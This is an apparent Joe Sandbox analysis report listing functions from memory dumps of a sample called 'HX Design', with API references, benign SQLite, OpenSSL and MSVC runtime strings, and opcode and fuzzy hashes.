Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: cf61fb6c00b1796c5bed08ecf7b6551a73a14dc995a044f45feadad5ae41d3ad
Instruction ID: 9a2b1dbf7c303c19e24e2778d57d8ccbda81e9d6edeae1bf8e1bec8b0bc80eeb
Opcode Fuzzy Hash: cf61fb6c00b1796c5bed08ecf7b6551a73a14dc995a044f45feadad5ae41d3ad
Instruction Fuzzy Hash: B7113920E0E207A1FAA8727D481557E92824F65330FD84734D93E4A7D2DDACB85AF7B1

Function 00007FFDFB369750 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 288COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140(?,?,?,?,?,?,?,00000000,00000000,?,00000003,00000000,00007FFDFB369F87,?,00000007,?), ref: 00007FFDFB369917

Strings

%.*z:%u, xrefs: 00007FFDFB3699E6
rowid, xrefs: 00007FFDFB3698A8
column%d, xrefs: 00007FFDFB369925

Memory Dump Source

Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true

Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd

Similarity

API ID: 00007A463010
String ID: %.*z:%u$column%d$rowid
API String ID: 4225454184-2903559916
Opcode ID: efce2a594c8615c6195497c0eb65d48d2a67f449694f3429559b3ef3d31313fd
Instruction ID: 038ab244b319e4827029765264ce789abc86db28bb39afb78d6e60c93da17c8a
Opcode Fuzzy Hash: efce2a594c8615c6195497c0eb65d48d2a67f449694f3429559b3ef3d31313fd
Instruction Fuzzy Hash: 01B1B022B4A6838AEB25AB15D420FB967D2AF49B94F494235CE6D477EDDF3CE405C300

Function 00007FF732075FA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF732075FDC
_invalid_parameter_noinfo.LIBCMT ref: 00007FF732076106
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7320761BC

Strings

verbose, xrefs: 00007FF732075FB0

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: verbose
API String ID: 3215553584-579935070
Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
Instruction ID: 3270c31eed4857952a290424676e7a39f7fd3d33aded40a8c2093a8f6b47a28d
Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
Instruction Fuzzy Hash: 8B91E332A08A46A5F761BE28D45437EB7A1AB40B54FC84132DA5F433D6DFBCE409E360

Function 00007FFDFB3785A0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 239COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140(?,?,?,?,00000080,?,?,?,00000000,00007FFDFB378A6F), ref: 00007FFDFB378739
00007FFE1A463010.VCRUNTIME140(?,?,?,?,00000080,?,?,?,00000000,00007FFDFB378A6F), ref: 00007FFDFB3787BB
00007FFE1A463010.VCRUNTIME140(?,?,?,?,00000080,?,?,?,00000000,00007FFDFB378A6F), ref: 00007FFDFB3788AD

Strings

RETURNING may not use "TABLE.*" wildcards, xrefs: 00007FFDFB378621

Memory Dump Source

Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true

Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd

Similarity

API ID: 00007A463010
String ID: RETURNING may not use "TABLE.*" wildcards
API String ID: 4225454184-2313493979
Opcode ID: 17f7c90136fb561778db9ab3758a5a3b376a01926fa97c884be4e8f3c66a5517
Instruction ID: cc23babf9bbf05fe045ddf153d9add95ab8e36e3d6f07dced58b4f27d65af066
Opcode Fuzzy Hash: 17f7c90136fb561778db9ab3758a5a3b376a01926fa97c884be4e8f3c66a5517
Instruction Fuzzy Hash: 13B1BE22B0AB8296E720DF16E4506A97BA1FB45BA4F158335DE7D077E9DF38E095C300

Function 00007FFDFB32D3D0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 220COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FFDFB327847), ref: 00007FFDFB32D52A
00007FFE1A463010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FFDFB327847), ref: 00007FFDFB32D554
00007FFE1A463010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FFDFB327847), ref: 00007FFDFB32D5A7

Strings

H, xrefs: 00007FFDFB32D53E

Memory Dump Source

Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true

Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd

Similarity

API ID: 00007A463010
String ID: H
API String ID: 4225454184-2852464175
Opcode ID: cfbeda1bf99951151eff030447c4d7a4d5e89bf1fbf00df94b65fd72b816f457
Instruction ID: dd03b6b2319f218abab9a377c64f7135729883edec48a92b4f64d4337209a29d
Opcode Fuzzy Hash: cfbeda1bf99951151eff030447c4d7a4d5e89bf1fbf00df94b65fd72b816f457
Instruction Fuzzy Hash: 9491B062B5A64287EB24AE159560B7967E0FB84F94F544634DEBD07BECCF3CE4408B10

Function 00007FF73207FBC8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF73207FEA7

Part of subcall function 00007FF732077A3C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF732077A59

Strings

UTF-8, xrefs: 00007FF73207FE26
ccs, xrefs: 00007FF73207FDE2
UTF-16LEUNICODE, xrefs: 00007FF73207FE45

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
Instruction ID: 94d5728b028eeeb74cbb77884a9a00c7886a046a4c8429e576379bb99012ac0d
Opcode Fuzzy Hash: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
Instruction Fuzzy Hash: DB81C272D08243A5F764BF2D8118278A6A2EB11B84FD58031CA2D97295CFECFC49F721

Function 00007FFDFB380410 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 216COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB38057F

Part of subcall function 00007FFDFB2E8BF0: 00007FFE1A463010.VCRUNTIME140(?,?,?,00007FFDFB2E8606), ref: 00007FFDFB2E8C21

Strings

<expr>, xrefs: 00007FFDFB380513
AND , xrefs: 00007FFDFB38044F, 00007FFDFB38046A
rowid, xrefs: 00007FFDFB38054E

Memory Dump Source

Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true

Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd

Similarity

API ID: 00007A463010
String ID: AND $<expr>$rowid
API String ID: 4225454184-4041574714
Opcode ID: bd8a3048d69df6166b223ea7dc75565c0762b21f5b460e88b0cbb52fce417d1a
Instruction ID: 9688dfbe239a051933855005f9425a18fced912b1721020356c8446602f4a9bc
Opcode Fuzzy Hash: bd8a3048d69df6166b223ea7dc75565c0762b21f5b460e88b0cbb52fce417d1a
Instruction Fuzzy Hash: A4A1AE72B4AA4386E704DF55D4A093877A1EB45B88F548035DA2E477ECDF3CE841CB91

Function 00007FFDFB3693F0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 198COMMON

Download Yara Rule

Strings

rowid, xrefs: 00007FFDFB36954E
column%d, xrefs: 00007FFDFB3695F8
%s.%s, xrefs: 00007FFDFB36956E

Memory Dump Source

Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true

Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd

Similarity

API ID:
String ID: %s.%s$column%d$rowid
API String ID: 0-1505470444
Opcode ID: 30ee24403bbbe39b15dc8828bd75070d7d44f9a04dc3d048d0a1485fb1bb9eaf
Instruction ID: a12c16e90fd89e0d7103a7508e541f1e43e58a8339b2493b34cd1168da30a2cb
Opcode Fuzzy Hash: 30ee24403bbbe39b15dc8828bd75070d7d44f9a04dc3d048d0a1485fb1bb9eaf
Instruction Fuzzy Hash: 5B91A022B0AB828ADB20EB15D464BA967A5FB49BB4F445326DA7D477E8DF38D401C300

Function 00007FFDFB3089A0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 192COMMON

Download Yara Rule

Strings

database corruption, xrefs: 00007FFDFB308A5F
8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355, xrefs: 00007FFDFB308A4C
%s at line %d of [%.10s], xrefs: 00007FFDFB308A66

Memory Dump Source

Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true

Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
API String ID: 0-3727861699
Opcode ID: ac59a9cb4a734ac58b84e693e8c4ebf4f1f7077b93233f305f08416909222bbb
Instruction ID: 5a111ef94da30ba1ac3b9bd83d492e325a50e1d8a48e7234f3f4dd4e02a40999
Opcode Fuzzy Hash: ac59a9cb4a734ac58b84e693e8c4ebf4f1f7077b93233f305f08416909222bbb
Instruction Fuzzy Hash: 4581D762B096D257D7509B258190A7EBBE0FF41788F084132DB9947AE9CE3CE455C740

Function 00007FFDFB343E60 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 183COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB34408E

Strings

, xrefs: 00007FFDFB343F3D
, , xrefs: 00007FFDFB343F1E
CREATE TABLE , xrefs: 00007FFDFB343F7F

Memory Dump Source

Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true

Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd

Similarity

API ID: 00007A463010
String ID: $, $CREATE TABLE
API String ID: 4225454184-3459038510
Opcode ID: eaaf35ae7b10ff9f02fc1879a24a9f13428addb4e320b869457f88e9802eb3dd
Instruction ID: a4bcfa055dff27ea284fe1cb7d4b3e597cef6778636e8b2c16a6c5fbb723c2c8
Opcode Fuzzy Hash: eaaf35ae7b10ff9f02fc1879a24a9f13428addb4e320b869457f88e9802eb3dd
Instruction Fuzzy Hash: AC613562B0A58286DB219F29A4506B9B7A2FB40BA8F444336DE7D433E9DF3CD546C300

Function 00007FFE0033F070 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 172COMMON

Download Yara Rule

APIs

00007FFE1FFB08A0.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFE0033F127

Strings

ssl_get_new_session, xrefs: 00007FFE0033F1D2, 00007FFE0033F30A
SSL_SESSION_new, xrefs: 00007FFE0033F0D0, 00007FFE0033F18E
..\s\ssl\ssl_sess.c, xrefs: 00007FFE0033F0B2, 00007FFE0033F0DC, 00007FFE0033F19A, 00007FFE0033F1BE, 00007FFE0033F1DE, 00007FFE0033F316

Memory Dump Source

Source File: 00000001.00000002.2108169054.00007FFE00311000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFE00310000, based on PE: true

Associated: 00000001.00000002.2108120113.00007FFE00310000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE00393000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE00395000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003BD000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003C8000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003D3000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108509138.00007FFE003D7000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108558516.00007FFE003D9000.00000004.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe00310000_HX Design.jbxd

Similarity

API ID: 00007
String ID: ..\s\ssl\ssl_sess.c$SSL_SESSION_new$ssl_get_new_session
API String ID: 3568877910-2527649602
Opcode ID: 81de3dcb5b9a74f6d10349495346cbec55276295be6eb05afdb2b4af8c059850
Instruction ID: 272dcd8de8c64bf7739dc96dbd61274f6e5f883682ce88c598a851b86cf390d6
Opcode Fuzzy Hash: 81de3dcb5b9a74f6d10349495346cbec55276295be6eb05afdb2b4af8c059850
Instruction Fuzzy Hash: FB719B25B08B828AE74ADB25D8903FD2391EB89B84F944135EB1D877EADF7CE5518300

Function 00007FFE00312469 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 172COMMON

Download Yara Rule

APIs

00007FFE1A461250.VCRUNTIME140 ref: 00007FFE0036D776

Strings

..\s\ssl\statem\extensions_srvr.c, xrefs: 00007FFE0036D735, 00007FFE0036D79A, 00007FFE0036D802, 00007FFE0036D82F, 00007FFE0036D874
tls_parse_ctos_server_name, xrefs: 00007FFE0036D729, 00007FFE0036D785, 00007FFE0036D7F6, 00007FFE0036D823, 00007FFE0036D868
D:\a\1\s\include\internal/packet.h, xrefs: 00007FFE0036D7AE, 00007FFE0036D7CF

Memory Dump Source

Source File: 00000001.00000002.2108169054.00007FFE00311000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFE00310000, based on PE: true

Associated: 00000001.00000002.2108120113.00007FFE00310000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE00393000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE00395000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003BD000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003C8000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003D3000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108509138.00007FFE003D7000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108558516.00007FFE003D9000.00000004.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe00310000_HX Design.jbxd

Similarity

API ID: 00007A461250
String ID: ..\s\ssl\statem\extensions_srvr.c$D:\a\1\s\include\internal/packet.h$tls_parse_ctos_server_name
API String ID: 909805961-4157686371
Opcode ID: df7c5cc1c5450ab236299e71f02084b029a770e3f54b11b68fceadd1af193070
Instruction ID: 8f94ef1d7e0a8356a132853814e32d52518e5e459600dfc9fe585d1c1a1b3e37
Opcode Fuzzy Hash: df7c5cc1c5450ab236299e71f02084b029a770e3f54b11b68fceadd1af193070
Instruction Fuzzy Hash: 0061BE61F1CA9381F762DB21E4007BD6791AB86B84F488132DB4D47BFEDE6CE6908701

Function 00007FF73206D648 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF73206D673
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF73206D70A
RtlUnwindEx.KERNEL32 ref: 00007FF73206D764

Strings

csm, xrefs: 00007FF73206D6F1

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
Instruction ID: d3077df64576c4ac8c499069be1209d2df6c603a8054bbb2a18b5d5ce8768f7e
Opcode Fuzzy Hash: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
Instruction Fuzzy Hash: 9451E432B19642AADB14EF15E044A78B391FB44F88F908130DE6E57788EFBDE845D714

Function 00007FFDFB308CA0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 152COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB308D27

Strings

database corruption, xrefs: 00007FFDFB308EB5
8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355, xrefs: 00007FFDFB308EA9
%s at line %d of [%.10s], xrefs: 00007FFDFB308EC1

Memory Dump Source

Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true

Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd

Similarity

API ID: 00007A463010
String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
API String ID: 4225454184-3727861699
Opcode ID: 75da13944be0d2eaaf71d09a02690a791e9ea79b5304e52c345f89a23cfe710d
Instruction ID: e15a76b2006dc3861bf3b06fa20d65176d00a4148436f69e83d3be6e2f6dd5cb
Opcode Fuzzy Hash: 75da13944be0d2eaaf71d09a02690a791e9ea79b5304e52c345f89a23cfe710d
Instruction Fuzzy Hash: 8B51E272709BC1C6CB109F19E4649AEBBA4FB54B88F19813AEB9D037A9DB3CD045C700

Function 00007FFDFB31C5E7 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 149COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB31C72D
00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB31C746

Strings

out of memory, xrefs: 00007FFDFB322478
string or blob too big, xrefs: 00007FFDFB322103

Memory Dump Source

Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true

Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd

Similarity

API ID: 00007A463010
String ID: out of memory$string or blob too big
API String ID: 4225454184-2410398255
Opcode ID: 32c2ae49c0d43b0bf73bf14441e4c9b52f205afacfc25aad9bb6812841d0f57a
Instruction ID: e5926ff295bb50c3d5aeb029fdd23964c6bb99dc958ef0cc7618713bd7d59060
Opcode Fuzzy Hash: 32c2ae49c0d43b0bf73bf14441e4c9b52f205afacfc25aad9bb6812841d0f57a
Instruction Fuzzy Hash: 6C61F462B4A65393E710EB26D56067E6BA4FB46B94F145032EE6D07BEDCF3CE4028710

Function 00007FF73206F288 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF73206F2B0
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF73206F398

Strings

csm, xrefs: 00007FF73206F2D2
csm, xrefs: 00007FF73206F3EA

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
Instruction ID: 3ff0ec4118221d5c5f5fa347dd57f2d483cbbc59d068c7651b482b107c95a8bd
